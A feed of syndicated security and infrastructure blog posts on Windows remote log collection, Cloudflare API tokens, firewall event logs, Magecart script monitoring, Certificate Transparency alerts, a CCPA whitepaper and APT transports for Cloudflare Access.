  3. Create a service account and configure it in the remote collector. The other option is to have an account on the collector machine that is given the proper access, so that you can use the integrated AD authentication
  4. Add the account to the following domain groups: Event log readers, Distributed COM users. The linked article above mentions “Remote management users” as well, but that’s optional if you just want to read the logs
  5. Give the “Manage auditing and security log” privilege to the service account through group policies (GPO) or via “local security policy”. Find it under User Rights Assignment > Manage auditing and security log
  6. Give WMI access – open “wmimgmt” -> right click -> properties > Security -> Advanced and allow the service account to “Execute Methods”, “Provider Write”, “Enable Account”, “Remote Enable”. To be honest, I’m not sure exactly which folder that should be applied to, and applying it to the root may be too wide, so you’d have to experiment
  7. Give registry permissions: Regedit -> Local machine -> System\CurrentControlSet\Services\eventlog\Security -> right click -> permissions and add the service account. According to the linked post you also have to modify a particular registry entry, but that’s not required just for reading the log. This step is probably the most bizarre and unexpected one.
  8. Make sure you have DCOM rights. This comes automatically wit the DCOM group, but double check via DCOMCnfg -> right click -> COM security
  9. Grant permissions for the service account on c:\windows\system32\winevt. This step is not required for “simple” reading of the logs, but I’ve seen it in various places, so in some scenarios you might need to check it
  10. Make sure the application or service that is reading the logs remotely has sufficient permissions – it can usually run with admin privileges, because it’s on a separate, dedicated machine.
  11. Restart services – that is optional, but can be done just in case: Restart “Windows Remote Management (WS-Management)” and “Windows Event Log” on the target machine

As you can see, there are many things that you can miss, and there isn’t a single place in any documentation to list those steps (though there are good guides like this that go in a slightly different direction).

I can’t but make a high-level observation here – the need to do everything above is an example of how security measures can “explode” and become really hard to manage. There are many service, groups, privileges, policies, inbound rules and whatnot, instead of just “Allow remote log reading for this user”. I know it’s inherently complex, but maybe security products should make things simpler by providing recipes for typical scenarios. Following guides in some blog is definitely worse than running a predefined set of commands. And running the “Allow remote access to event log” recipe would do just what you need. Of course, knowing which recipe to run and how to parameterize it would require specific knowledge, but you can’t do security without trained experts.

The post Remote Log Collection on Windows appeared first on Bozho's tech blog.

Announcing the General Availability of API Tokens

Post Syndicated from Garrett Galow original https://blog.cloudflare.com/api-tokens-general-availability/

Announcing the General Availability of API Tokens

APIs at Cloudflare

Announcing the General Availability of API Tokens

Today we are announcing the general availability of API Tokens – a scalable and more secure way to interact with the Cloudflare API. As part of making a better internet, Cloudflare strives to simplify manageability of a customer’s presence at the edge. Part of the way we do this is by ensuring that all of our products and services are configurable by API. Customers ranging from partners to enterprises to developers want to automate management of Cloudflare. Sometimes that is done via our API directly, and other times it is done via open source software we help maintain like our Terraform provider or Cloudflare-Go library. It is critical that customers who are automating management of Cloudflare can keep their Cloudflare services as secure as possible.

Least Privilege and Why it Matters

Securing software systems is hard. Limiting what a piece of software can do is a good defense to prevent mistakes or malicious actions from having greater impact than they could. The principle of least privilege helps guide how much access a given system should have to perform actions. Originally formulated by Jerome Saltzer, “Every program and every privileged user of the system should operate using the least amount of privilege necessary to complete the job.” In the case of Cloudflare, many customers have various domains routing traffic leveraging many different services. If a bad actor gets unauthorized access to a system they can use whatever access that system has to cause further damage or steal additional information.

Let’s see how the capabilities of API Tokens fit into the principle of least privilege.

About API Tokens

API Tokens provide three main capabilities:

  1. Scoping API Tokens by Cloudflare resource
  2. Scoping API Tokens by permission
  3. The ability to provision multiple API Tokens

Let’s break down each of these capabilities.

Scoping API Tokens by Cloudflare Resource

Cloudflare separates service configuration by zone which typically equates to a domain. Additionally, some customers have multiple accounts each with many zones. It is important that when granting API access to a service it only has access to the accounts resources and zones that are pertinent for the job at hand. API Tokens can be scoped to only cover specific accounts and specific zones. One common use case is if you have a staging zone and a production zone, then an API Token can be limited to only be able to affect the staging zone and not have access to the production zone.

Scoping API Tokens by Permission

Being able to scope an API Token to a specific zone is great, but in one zone there are many different services that can be configured: firewall rules, page rules, and load balancers just to name a few. If a customer has a service that should only be able to create new firewall rules in response to traffic patterns, then also allowing that service to change DNS records is a violation of least privilege. API Tokens allow you to scope each token to specific permission. Multiple permissions can be combined to create custom tokens to fit specific use cases.

Multiple API Tokens

If you use Cloudflare to protect and accelerate multiple services, then may be making API changes to Cloudflare from multiple locations – different servers, VMs, containers, or workers. Being able to create an API Token per service means each service is insulated to changes from another. If one API Token is leaked or needs to be rolled, there won’t be any impact to the other services’ API Tokens. Also the capabilities mentioned previously mean that each service can be scoped to exactly what actions and resources necessary. This allows customers to better realize the practice of least privilege for accessing Cloudflare by API.

Now let’s walk through how to create an API Token and use it.

Using API Tokens

To create your first API Token go to the ‘API Tokens’ section of your user profile which can be found here: dash.cloudflare.com/profile/api-tokens

1. On this page, you will find both a list of all of your API Tokens in addition to your Global API Key and Origin CA Key.

Announcing the General Availability of API Tokens
API Tokens Getting Started – Create Token

To create your first API Token, select ‘Create Token’.


2. On the create screen there are two ways to create your token. You can create it from scratch through the ‘Custom’ option or you can start with a predefined template by selecting ‘Start with a template’.

Announcing the General Availability of API Tokens
API Token Template Selection

For this case, we will use the ‘Edit zone DNS’ template to create an API Token that can edit a single zone’s DNS records.


3. Once the template is selected, we need to pick a zone for the API Token to be scoped to. Notice that the DNS Edit permission was already pre-selected.

Announcing the General Availability of API Tokens
Specifying the zone for which the token will be able to control DNS

In this case, ‘garrettgalow.com’ is selected as the Cloudflare zone that the API Token will be able to edit DNS records for.


4. Once I select continue to summary, I’m given a chance to review my selection. In this case the resources and permissions are quite simple, but this gives you a change to make sure you are giving the API Token exactly the correct amount of privilege before creating it.

Announcing the General Availability of API Tokens
Token Summary – confirmation


5. Once created, we are presented with the API Token. This screen is the only time you will be presented with the secret so be sure to put the secret in a safe place! Anyone with this secret can perform the granted actions on the resources specified so protect it like a password. In the below screenshot I have black boxed the secret for obvious reasons. If you happen to lose the secret, you can always regenerate it from the API Tokens table so you don’t have to configure all the permissions again.

Announcing the General Availability of API Tokens
Token creation completion screen with the token secret

In addition to the secret itself this screen provides an example curl request that can be used to verify that the token was successfully created. It also provides an example of how the token should be used for any direct HTTP requests. With API Tokens we now follow the RFC Authorization Bearer standard. Calling that API we see a successful response telling us that the token is valid and active

~$ curl -X GET "https://api.cloudflare.com/client/v4/user/tokens/verify" \
>      -H "Authorization: Bearer vh9awGupxxxxxxxxxxxxxxxxxxx" \
>      -H "Content-Type:application/json" | jq

{
  "result": {
    "id": "ad599f2b67cdccf24a160f5dcd7bc57b",
    "status": "active"
  },
  "success": true,
  "errors": [],
  "messages": [
    {
      "code": 10000,
      "message": "This API Token is valid and active",
      "type": null
    }
  ]
}

What’s coming next

For anyone using the Cloudflare API, we recommend moving to using API Tokens over their predecessor API Keys going forward. With this announcement, our Terraform provider, Cloudflare-Go library, and WordPress plugin are all updated for API Token compatibility. Other libraries will receive updates soon. Both API Tokens and API Keys will be supported for the time being for customers to be able to safely migrate. We have more planned capabilities for API Tokens to further safeguard how and when tokens are used, so stay tuned for future announcements!

Let us know what you think and what you’d like to see next regarding API security on the Cloudflare Community.

Supercharging Firewall Events for Self-Serve

Post Syndicated from Alex Cruz Farmer original https://blog.cloudflare.com/supercharging-firewall-events-for-self-serve/

Supercharging Firewall Events for Self-Serve

Today, I’m very pleased to announce the release of a completely overhauled version of our Firewall Event log to our Free, Pro and Business customers. This new Firewall Events log is now available in your Dashboard, and you are not required to do anything to receive this new capability.

Supercharging Firewall Events for Self-Serve

No more modals!

We have done away with those pesky modals, providing a much smoother user experience. To review more detailed information about an event, you simply click anywhere on the event list row.

Supercharging Firewall Events for Self-Serve

In the expanded view, you are provided with all the information you may need to identify or diagnose issues with your Firewall or find more details about a potential threat to your application.

Additional matches per event

Cloudflare has several Firewall features to give customers granular control of their security. With this control comes some complexity when debugging why a request was stopped by the Firewall. To help clarify what happened, we have provided an “Additional matches” count at the bottom for events triggered by multiple services or rules for the same request. Clicking the number expands a list showing each rule and service along with the corresponding action.

Supercharging Firewall Events for Self-Serve

Search for any field within a Firewall Event

This is one of my favourite parts of our new Firewall Event Log. Many of our customers have expressed their frustration with the difficulty of pinpointing specific events. This is where our new search capabilities come into their own. Customers can now filter and freeform search for any field that is visible in a Firewall Event!

Let’s say you want to find all the requests originating from a specific ISP or country where your Firewall Rules issued a JavaScript challenge. There are two different ways to do this in the UI.

Firstly, when in the detail view, you can create an include or exclude filter for that field value.

Supercharging Firewall Events for Self-Serve

Secondly, you can create a freeform filter using the “+ Add Filter” button at the top, or edit one of the already filtered fields:

Supercharging Firewall Events for Self-Serve

As illustrated above, with our WAF Managed Rules enabled in log only, we can see all the rules which would have triggered if this was a legitimate attack. This allows you to confirm that your configuration is working as expected.

Scoping your search to a specific date and time

In our old Firewall Event Log, to find an event, users had to traverse through many pages to find Events from a specific date. The last major change we have added is the capability to select a time window to view events between two points in time over the last 2 weeks. In the time selection window, Free and Pro customers can choose a 24 hour time window and our Business customers can view up to 72 hours.

Supercharging Firewall Events for Self-Serve

We want your feedback!

We need your help! Please feel free to leave any feedback on our Community forums, or open a Support ticket with any problems you find. Your feedback is critical to our product improvement process, and we look forward to hearing from you.

Protecting JavaScript Files (From Magecart-Style Attacks)

Post Syndicated from Bozho original https://techblog.bozho.net/protecting-javascript-files-from-magecart-attacks/

Most web pages now consist of multiple JavaScript files that are included in various ways (via >script< or in some more dynamic fashion, bundled and minified or not). But since these scripts interact with everything on the page, they can be a security risk.

And Magecart showcased that risk – the group attacked multiple websites, including British Airways and Ticketmaster, and stole a few hundred thousand credit card numbers.

It is a simple attack where attacker inserts a malicious javascript snippet into a trusted javascript file, collects credit card details entered into payment forms and sends them to an attacker-owned website. Obviously, the easy part is writing the malicious javascript; the hard part is getting it on the target website.

Many websites rely on externally hosted assets (including scripts) – be it a CDN, or a dedicated asset server (as in the case of British Airways). These externally hosted assets may be vulnerable in several ways:

  • Asset servers may be less protected than the actual server, because they are just static assets, what could go wrong?
  • Credentials to access CDN configuration may be leaked which can lead to an attacker replacing the original source scripts with their own
  • Man-in-the-middle attacks are possible if the asset server is misconfigured (e.g. allowing TLS downgrade attack)
  • The external service (e.g. CND) that was previously trusted can go rogue – that’s unlikely with big providers, but smaller and cheaper ones are less predictable

Once the attackers have replaced the script, they are silently collecting data until they are caught. And this can be a long time.

So how to protect against those attacks? A typical advice is to introduce a content security policy, which will allow scripts from untrusted domains to be executed. This is a good idea, but doesn’t help in the scenario where a trusted domain is compromised. There are several main approaches, and I’ll summarize them below:

  • Subresource integrity – this is a browser feature that lets you specify the hash of a script file and validates that hash when the page loads. If it doesn’t match the hash of the actually loaded script, the script is blocked. This sounds great, but has several practical implications. First, it means you need to complicate your build pipeline so that it calculates the hashes of minified and bundled resources and inject those hashes in the page templates. It’s a tedious process, but it’s doable. Then there are the dynamically loaded scripts where you can’t use this feature, and there are the browsers that don’t support it fully (Edge, IE and Safari on mobile). And finally, if you don’t have a good build pipeline (which many small websites don’t), a very small legitimate change in the script can break your entire website.
  • Don’t use external services – that sounds straightforward but it isn’t always. CDNs exist for a reason and optimize your site loading speeds and therefore ranking, internal policies may require using a dedicated asset server, sometimes plugins (e.g. for WordPress) may fetch external resources. An exception to this rule is allowed if you somehow sandbox the third party script (e.g. via iframe as explained in the link above)
  • Secure all external servers properly – if you can do that, that’s great – upgrade the supported cipher suites, monitor for 0days, use only highly trusted CDNs. Regardless of anything, you should obviously always strive to do that. But it requires expertise and resources, which may not be available to every company and every team.

There is one more scenario that may sound strange – if an attacker hacks into your main application server(s), they can replace the scripts with whatever they want. It sounds strange at first, because if they have access to the server, it’s game over anyway. But it’s not always full access with RCE – might be a limited access. Credit card numbers are usually not stored in plain text in the database, so having access to the application server may not mean you have access to the credit card numbers. And changing the custom backend code to collect the data is much more unpredictable and time-consuming than just replacing the scripts with malicious ones. None of the options above protect against that (as in this case the attacker may be able to change the expected hash for the subresource integrity check)

Because of the limitations of the above approaches, at my company we decided to provide a tool to monitor your website for such attacks. It’s called Scriptinel.com (short for Script Sentinel) and is currently in early beta. It’s mainly targeted at small website owners who can’t get any of the above 3 points, but can be used for sophisticated websites as well.

What it does is straightforward – it scans a given URL, extracts all scripts from it (even the dynamic ones), and starts monitoring them for changes with periodic requests. If it discovers a change, it notifies the website owner so that they can react.

This means that the attacker may have a few minutes to collect data, but time is an important factor here – this is not a “SELECT *” data breach; it relies on customers using the website. So a few minutes minimizes the damage. And it doesn’t break your website (I guess we can have a script to include that blocks the page if scriptinel has found discrepancies). It also doesn’t require changes in the build process to include hashes. Of course, such a reactive approach is not perfect, especially if there is nobody to react, but monitoring is a good idea regardless of whether other approaches are used.

There is the issue of protected pages and pages that are not directly accessible via a GET request – e.g. a payment page. For that you can enter your javascript files individually, rather than having the tool scan the page. We can add a more sophisticated user journey scan, with specifying credentials and steps to reach the protected pages, but for now that seems unnecessary.

How does it solve the “main server compromised” problem? Well, nothing solves that perfectly, as the attacker can do changes that serve the legitimate version of the script to your monitoring servers (identifying them by IP) and the modified scripts to everyone else. This can be done on the compromised external asset servers as well (though not with leaked CDN credentials). However this implies the attacker knows that Scriptinel is used, knows the IP addresses of our scanners, and has gained sufficient control to server different versions based on IP. This raises the bar significantly, and can even be made impossible to pull off if we regularly change the IP addresses in a significantly large IP range.

Such functionality may be available in some enterprise security suites, though I’m not aware of it (if it exists somewhere, please let me know).

Overall, the problem is niche, but tough, and not solving it can lead to serious data breaches even if your database is perfectly protected. Scriptinel is a simple to use, good enough solution (and one that’s arguably better than the other options).

Good information security is the right combination of knowledge, implementation of best practices and tools to help you with that. And I maybe Scriptinel is one such tool.

The post Protecting JavaScript Files (From Magecart-Style Attacks) appeared first on Bozho's tech blog.

Introducing Certificate Transparency Monitoring

Post Syndicated from Ben Solomon original https://blog.cloudflare.com/introducing-certificate-transparency-monitoring/

Introducing Certificate Transparency Monitoring

Introducing Certificate Transparency Monitoring

Today we’re launching Certificate Transparency Monitoring (my summer project as an intern!) to help customers spot malicious certificates. If you opt into CT Monitoring, we’ll send you an email whenever a certificate is issued for one of your domains. We crawl all public logs to find these certificates quickly. CT Monitoring is available now in public beta and can be enabled in the Crypto Tab of the Cloudflare dashboard.

Background

Most web browsers include a lock icon in the address bar. This icon is actually a button — if you’re a security advocate or a compulsive clicker (I’m both), you’ve probably clicked it before! Here’s what happens when you do just that in Google Chrome:

Introducing Certificate Transparency Monitoring

This seems like good news. The Cloudflare blog has presented a valid certificate, your data is private, and everything is secure. But what does this actually mean?

Certificates

Your browser is performing some behind-the-scenes work to keep you safe. When you request a website (say, cloudflare.com), the website should present a certificate that proves its identity. This certificate is like a stamp of approval: it says that your connection is secure. In other words, the certificate proves that content was not intercepted or modified while in transit to you. An altered Cloudflare site would be problematic, especially if it looked like the actual Cloudflare site. Certificates protect us by including information about websites and their owners.

We pass around these certificates because the honor system doesn’t work on the Internet. If you want a certificate for your own website, just request one from a Certificate Authority (CA), or sign up for Cloudflare and we’ll do it for you! CAs issue certificates just as real-life notaries stamp legal documents. They confirm your identity, look over some data, and use their special status to grant you a digital certificate. Popular CAs include DigiCert, Let’s Encrypt, and Sectigo. This system has served us well because it has kept imposters in check, but also promoted trust between domain owners and their visitors.

Introducing Certificate Transparency Monitoring

Unfortunately, nothing is perfect.

It turns out that CAs make mistakes. In rare cases, they become reckless. When this happens, illegitimate certificates are issued (even though they appear to be authentic). If a CA accidentally issues a certificate for your website, but you did not request the certificate, you have a problem. Whoever received the certificate might be able to:

  1. Steal login credentials from your visitors.
  2. Interrupt your usual services by serving different content.

These attacks do happen, so there’s good reason to care about certificates. More often, domain owners lose track of their certificates and panic when they discover unexpected certificates. We need a way to prevent these situations from ruining the entire system.

Certificate Transparency

Ah, Certificate Transparency (CT). CT solves the problem I just described by making all certificates public and easy to audit. When CAs issue certificates, they must submit certificates to at least two “public logs.” This means that collectively, the logs carry important data about all trusted certificates on the Internet. Several companies offer CT logs — Google has launched a few of its own. We announced Cloudflare’s Nimbus log last year.

Logs are really, really big, and often hold hundreds of millions of certificate records.

Introducing Certificate Transparency Monitoring

The log infrastructure helps browsers validate websites’ identities. When you request cloudflare.com in Safari or Google Chrome, the browser will actually require Cloudflare’s certificate to be registered in a CT log. If the certificate isn’t found in a log, you won’t see the lock icon next to the address bar. Instead, the browser will tell you that the website you’re trying to access is not secure. Are you going to visit a website marked “NOT SECURE”? Probably not.

There are systems that audit CT logs and report illegitimate certificates. Therefore, if your browser finds a valid certificate that is also trusted in a log, everything is secure.

What We’re Announcing Today

Cloudflare has been an industry leader in CT. In addition to Nimbus, we launched a CT dashboard called Merkle Town and explained how we made it. Today, we’re releasing a public beta of Certificate Transparency Monitoring.

If you opt into CT Monitoring, we’ll send you an email whenever a certificate is issued for one of your domains. When you get an alert, don’t panic; we err on the side of caution by sending alerts whenever a possible domain match is found. Sometimes you may notice a suspicious certificate. Maybe you won’t recognize the issuer, or the subdomain is not one you offer (e.g. slowinternet.cloudflare.com). Alerts are sent quickly so you can contact a CA if something seems wrong.

Introducing Certificate Transparency Monitoring

This raises the question: if services already audit public logs, why are alerts necessary? Shouldn’t errors be found automatically? Well no, because auditing is not exhaustive. The best person to audit your certificates is you. You know your website. You know your personal information. Cloudflare will put relevant certificates right in front of you.

You can enable CT Monitoring on the Cloudflare dashboard. Just head over to the Crypto Tab and find the “Certificate Transparency Monitoring” card. You can always turn the feature off if you’re too popular in the CT world.

Introducing Certificate Transparency Monitoring

If you’re on a Business or Enterprise plan, you can tell us who to notify. Instead of emailing the zone owner (which we do for Free and Pro customers), we accept up to 10 email addresses as alert recipients. We do this to avoid overwhelming large teams. These emails do not have to be tied to a Cloudflare account and can be manually added or removed at any time.

Introducing Certificate Transparency Monitoring

How This Actually Works

Our Cryptography and SSL teams worked hard to make this happen; they built on the work of some clever tools mentioned earlier:

  • Merkle Town is a hub for CT data. We process all trusted certificates and present relevant statistics on our website. This means that every certificate issued on the Internet passes through Cloudflare, and all the data is public (so no privacy concerns here).
  • Cloudflare Nimbus is our very own CT log. It contains more than 400 million certificates.

Introducing Certificate Transparency Monitoring
Note: Cloudflare, Google, and DigiCert are not the only CT log providers.

So here’s the process… At some point in time, you (or an impostor) request a certificate for your website. A Certificate Authority approves the request and issues the certificate. Within 24 hours, the CA sends this certificate to a set of CT logs. This is where we come in: Cloudflare uses an internal process known as “The Crawler” to look through millions of certificate records. Merkle Town dispatches The Crawler to monitor CT logs and check for new certificates. When The Crawler finds a new certificate, it pulls the entire certificate through Merkle Town.

Introducing Certificate Transparency Monitoring

When we process the certificate in Merkle Town, we also check it against a list of monitored domains. If you have CT Monitoring enabled, we’ll send you an alert immediately. This is only possible because of Merkle Town’s existing infrastructure. Also, The Crawler is ridiculously fast.

Introducing Certificate Transparency Monitoring

I Got a Certificate Alert. What Now?

Good question. Most of the time, certificate alerts are routine. Certificates expire and renew on a regular basis, so it’s totally normal to get these emails. If everything looks correct (the issuer, your domain name, etc.), go ahead and toss that email in the trash.

In rare cases, you might get an email that looks suspicious. We provide a detailed support article that will help. The basic protocol is this:

  1. Contact the CA (listed as “Issuer” in the email).
  2. Explain why you think the certificate is suspicious.
  3. The CA should revoke the certificate (if it really is malicious).

We also have a friendly support team that can be reached here. While Cloudflare is not at CA and cannot revoke certificates, our support team knows quite a bit about certificate management and is ready to help.

The Future

Introducing Certificate Transparency Monitoring

Certificate Transparency has started making regular appearances on the Cloudflare blog. Why? It’s required by Chrome and Safari, which dominate the browser market and set precedents for Internet security. But more importantly, CT can help us spot malicious certificates before they are used in attacks. This is why we will continue to refine and improve our certificate detection methods.

What are you waiting for? Go enable Certificate Transparency Monitoring!

Introducing the “Preparing for the California Consumer Privacy Act” whitepaper

Post Syndicated from Julia Soscia original https://aws.amazon.com/blogs/security/introducing-the-preparing-for-the-california-consumer-privacy-act-whitepaper/

AWS has published a whitepaper, Preparing for the California Consumer Protection Act, to provide guidance on designing and updating your cloud architecture to follow the requirements of the California Consumer Privacy Act (CCPA), which goes into effect on January 1, 2020.

The whitepaper is intended for engineers and solution builders, but it also serves as a guide for qualified security assessors (QSAs) and internal security assessors (ISAs) so that you can better understand the range of AWS products and services that are available for you to use.

The CCPA was enacted into law on June 28, 2018 and grants California consumers certain privacy rights. The CCPA grants consumers the right to request that a business disclose the categories and specific pieces of personal information collected about the consumer, the categories of sources from which that information is collected, the “business purposes” for collecting or selling the information, and the categories of third parties with whom the information is shared. This whitepaper looks to address the three main subsections of the CCPA: data collection, data retrieval and deletion, and data awareness.

To read the text of the CCPA please visit the website for California Legislative Information.

If you have questions or want to learn more, contact your account executive or leave a comment below.

Want more AWS Security how-to content, news, and feature announcements? Follow us on Twitter.

Author photo

Julia Soscia

Julia is a Solutions Architect at Amazon Web Services based out of New York City. Her main focus is to help customers create well-architected environments on the AWS cloud platform. She is an experienced data analyst with a focus in Big Data and Analytics.

Author photo

Anthony Pasquarielo

Anthony is a Solutions Architect at Amazon Web Services. He’s based in New York City. His main focus is providing customers technical guidance and consultation during their cloud journey. Anthony enjoys delighting customers by designing well-architected solutions that drive value and provide growth opportunity for their business.

Author photo

Justin De Castri

Justin is a Manager of Solutions Architecture at Amazon Web Services based in New York City. His primary focus is helping customers build secure, scaleable, and cost optimized solutions that are aligned with their business objectives.

Securing infrastructure at scale with Cloudflare Access

Post Syndicated from Jeremy Bernick original https://blog.cloudflare.com/access-wildcard-subdomain/

Securing infrastructure at scale with Cloudflare Access

I rarely have to deal with the hassle of using a corporate VPN and I hope it remains this way. As a new member of the Cloudflare team, that seems possible. Coworkers who joined a few years ago did not have that same luck. They had to use a VPN to get any work done. What changed?

Cloudflare released Access, and now we’re able to do our work without ever needing a VPN again. Access is a way to control access to your internal applications and infrastructure. Today, we’re releasing a new feature to help you replace your VPN by deploying Access at an even greater scale.

Access in an instant

Access replaces a corporate VPN by evaluating every request made to a resource secured behind Access. Administrators can make web applications, remote desktops, and physical servers available at dedicated URLs, configured as DNS records in Cloudflare. These tools are protected via access policies, set by the account owner, so that only authenticated users can access those resources. These end users are able to be authenticated over both HTTPS and SSH requests. They’re prompted to login with their SSO credentials and Access redirects them to the application or server.

For your team, Access makes your internal web applications and servers in your infrastructure feel as seamless to reach as your SaaS tools. Originally we built Access to replace our own corporate VPN. In practice, this became the fastest way to control who can reach different pieces of our own infrastructure. However, administrators configuring Access were required to create a discrete policy per each application/hostname. Now, administrators don’t have to create a dedicated policy for each new resource secured by Access; one policy will cover each URL protected.

When Access launched, the product’s primary use case was to secure internal web applications. Creating unique rules for each was tedious, but manageable. Access has since become a centralized way to secure infrastructure in many environments. Now that companies are using Access to secure hundreds of resources, that method of building policies no longer fits.

Starting today, Access users can build policies using a wildcard subdomain to replace the typical bottleneck that occurs when replacing dozens or even hundreds of bespoke rules within a single policy. With a wildcard, the same ruleset will now automatically apply to any subdomain your team generates that is gated by Access.

How can teams deploy at scale with wildcard subdomains?

Administrators can secure their infrastructure with a wildcard policy in the Cloudflare dashboard. With Access enabled, Cloudflare adds identity-based evaluation to that traffic.

In the Access dashboard, you can now build a rule to secure any subdomain of the site you added to Cloudflare. Create a new policy and enter a wildcard tag (“*”) into the subdomain field. You can then configure rules, at a granular level, using your identity provider to control who can reach any subdomain of that apex domain.

Securing infrastructure at scale with Cloudflare Access

This new policy will propagate to all 180 of Cloudflare’s data centers in seconds and any new subdomains created will be protected.

Securing infrastructure at scale with Cloudflare Access

How are teams using it?

Since releasing this feature in a closed beta, we’ve seen teams use it to gate access to their infrastructure in several new ways. Many teams use Access to secure dev and staging environments of sites that are being developed before they hit production. Whether for QA or collaboration with partner agencies, Access helps make it possible to share sites quickly with a layer of authentication. With wildcard subdomains, teams are deploying dozens of versions of new sites at new URLs without needing to touch the Access dashboard.

For example, an administrator can create a policy for “*.example.com” and then developers can deploy iterations of sites at “dev-1.example.com” and “dev-2.example.com” and both inherit the global Access policy.

The feature is also helping teams lock down their entire hybrid, on-premise, or public cloud infrastructure with the Access SSH feature. Teams can assign dynamic subdomains to their entire fleet of servers, regardless of environment, and developers and engineers can reach them over an SSH connection without a VPN. Administrators can now bring infrastructure online, in an entirely new environment, without additional or custom security rules.

What about creating DNS records?

Cloudflare Access requires users to associate a resource with a domain or subdomain. While the wildcard policy will cover all subdomains, teams will still need to connect their servers to the Cloudflare network and generate DNS records for those services.

Argo Tunnel can reduce that burden significantly. Argo Tunnel lets you expose a server to the Internet without opening any inbound ports. The service runs a lightweight daemon on your server that initiates outbound tunnels to the Cloudflare network.

Instead of managing DNS, network, and firewall complexity, Argo Tunnel helps administrators serve traffic from their origin through Cloudflare with a single command. That single command will generate the DNS record in Cloudflare automatically, allowing you to focus your time on building and managing your infrastructure.

What’s next?

More teams are adopting a hybrid or multi-cloud model for deploying their infrastructure. In the past, these teams were left with just two options for securing those resources: peering a VPN with each provider or relying on custom IAM flows with each environment. In the end, both of these solutions were not only quite costly but also equally unmanageable.

While infrastructure benefits from becoming distributed, security is something that is best when controlled in a single place. Access can consolidate how a team controls who can reach their entire fleet of servers and services.

A Tale of Two (APT) Transports

Post Syndicated from Ryan Djurovich original https://blog.cloudflare.com/apt-transports/

A Tale of Two (APT) Transports

Securing access to your APT repositories is critical. At Cloudflare, like in most organizations, we used a legacy VPN to lock down who could reach our internal software repositories. However, a network perimeter model lacks a number of features that we consider critical to a team’s security.

As a company, we’ve been moving our internal infrastructure to our own zero-trust platform, Cloudflare Access. Access added SaaS-like convenience to the on-premise tools we managed. We started with web applications and then moved resources we need to reach over SSH behind the Access gateway, for example Git or user-SSH access. However, we still needed to handle how services communicate with our internal APT repository.

We recently open sourced a new APT transport which allows customers to protect their private APT repositories using Cloudflare Access. In this post, we’ll outline the history of APT tooling, APT transports and introduce our new APT transport for Cloudflare Access.

A brief history of APT

Advanced Package Tool, or APT, simplifies the installation and removal of software on Debian and related Linux distributions. Originally released in 1998, APT was to Debian what the App Store was to modern smartphones – a decade ahead of its time!

APT sits atop the lower-level dpkg tool, which is used to install, query, and remove .deb packages – the primary software packaging format in Debian and related Linux distributions such as Ubuntu. With dpkg, packaging and managing software installed on your system became easier – but it didn’t solve for problems around distribution of packages, such as via the Internet or local media; at the time of inception, it was commonplace to install packages from a CD-ROM.

APT introduced the concept of repositories – a mechanism for storing and indexing a collection of .deb packages. APT supports connecting to multiple repositories for finding packages and automatically resolving package dependencies. The way APT connects to said repositories is via a “transport” – a mechanism for communicating between the APT client and its repository source (more on this later).

APT over the Internet

Prior to version 1.5, APT did not include support for HTTPS – if you wanted to install a package over the Internet, your connection was not encrypted. This reduces privacy – an attacker snooping traffic could determine specific package version your system is installing. It also exposes you to man-in-the-middle attacks where an attacker could, for example, exploit a remote code execution vulnerability. Just 6 months ago, we saw an example of the latter with CVE-2019-3462.

Enter the APT HTTPS transport – an optional transport you can install to add support for connecting to repositories over HTTPS. Once installed, users need to configure their APT sources.list with repositories using HTTPS.

The challenge here, of course, is that the most common way to install this transport is via APT and HTTP – a classic bootstrapping problem! An alternative here is to download the .deb package via curl and install it via dpkg. You’ll find the links to apt-transport-https binaries for Stretch here – once you have the URL path for your system architecture, you can download it from the deb.debian.org mirror-redirector over HTTPS, e.g. for amd64 (a.k.a. x86_64):

curl -o apt-transport-https.deb -L https://deb.debian.org/debian/pool/main/a/apt/apt-transport-https_1.4.9_amd64.deb 
HASH=c8c4366d1912ff8223615891397a78b44f313b0a2f15a970a82abe48460490cb && echo "$HASH  apt-transport-https.deb" | sha256sum -c
sudo dpkg -i apt-transport-https.deb

To confirm which APT transports are installed on your system, you can list each “method binary” that is installed:

ls /usr/lib/apt/methods

With apt-transport-https installed you should now see ‘https’ in that list.

The state of APT & HTTPS on Debian

You may be wondering how relevant this APT HTTPS transport is today. Given the prevalence of HTTPS on the web today, I was surprised when I found out exactly how relevant it is.

Up until a couple of weeks ago, Debian Stretch (9.x) was the current stable release; 9.0 was first released in June 2017 – and the latest version (9.9) includes apt 1.4.9 by default – meaning that securing your APT communication for Debian Stretch requires installing the optional apt-transport-https package.

Thankfully, on July 6 of this year, Debian released the latest version – Buster – which currently includes apt 1.8.2 with HTTPS support built-in by default, negating the need for installing the apt-transport-https package – and removing the bootstrapping challenge of installing HTTPS support via HTTPS!

BYO HTTPS APT Repository

A powerful feature of APT is the ability to run your own repository. You can mirror a public repository to improve performance or protect against an outage. And if you’re producing your own software packages, you can run your own repository to simplify distribution and installation of your software for your users.

If you have your own APT repository and you’re looking to secure it with HTTPS we’ve offered free Universal SSL since 2014 and last year introduced a way to require it site-wide automatically with one click. You’ll get the benefits of DDoS attack protection, a Global CDN with Caching, and Analytics.

But what if you’re looking for more than just HTTPS for your APT repository? For companies operating private APT repositories, authentication of your APT repository may be a challenge. This is where our new, custom APT transport comes in.

Building custom transports

The system design of APT is powerful in that it supports extensibility via Transport executables, but how does this mechanism work?

When APT attempts to connect to a repository, it finds the executable which matches the “scheme” from the repository URL (e.g. “https://” prefix on a repository results in the “https” executable being called).

APT then uses the common Linux standard streams: stdin, stdout, and stderr. It communicates via stdin/stdout using a set of plain-text Messages, which follow IETF RFC #822 (the same format that .deb “Package” files use).

Examples of input message include “600 URI Acquire”, and examples of output messages include “200 URI Start” and “201 URI Done”:

A Tale of Two (APT) Transports

If you’re interested in building your own transport, check out the APT method interface spec for more implementation details.

APT meets Access

Cloudflare prioritizes dogfooding our own products early and often. The Access product has given our internal DevTools team a chance to work closely with the product team as we build features that help solve use cases across our organization. We’ve deployed new features internally, gathered feedback, improved them, and then released them to our customers. For example, we’ve been able to iterate on tools for Access like the Atlassian SSO plugin and the SSH feature, as collaborative efforts between DevTools and the Access team.

Our DevTools team wanted to take the same dogfooding approach to protect our internal APT repository with Access. We knew this would require a custom APT transport to support generating the required tokens and passing the correct headers in HTTPS requests to our internal APT repository server. We decided to build and test our own transport that both generated the necessary tokens and passed the correct headers to allow us to place our repository behind Access.

After months of internal use, we’re excited to announce that we have recently open-sourced our custom APT transport, so our customers can also secure their APT repositories by enabling authentication via Cloudflare Access.

